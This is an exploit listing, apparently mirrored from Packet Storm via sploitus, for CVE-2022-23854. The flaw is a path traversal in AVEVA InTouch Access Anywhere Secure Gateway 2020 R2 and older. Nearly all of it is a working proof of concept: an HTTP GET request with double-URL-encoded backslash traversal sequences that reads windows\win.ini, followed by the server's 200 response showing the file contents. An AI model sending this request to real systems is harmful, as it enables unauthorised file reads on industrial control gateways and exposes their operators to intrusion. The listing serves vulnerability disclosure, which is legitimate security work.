Share 
## https://sploitus.com/exploit?id=PACKETSTORM:169818
Exploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal  
Exploit Author: Jens Regel (CRISEC IT-Security)  
Date: 11/11/2022  
CVE: CVE-2022-23854  
Version: Access Anywhere Secure Gateway versions 2020 R2 and older  
  
Proof of Concept:  
GET   
/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini   
HTTP/1.1  
  
HTTP/1.1 200 OK  
Server: EricomSecureGateway/8.4.0.26844.*  
(..)  
  
; for 16-bit app support  
[fonts]  
[extensions]  
[mci extensions]  
[files]  
[Mail]  
MAPI=1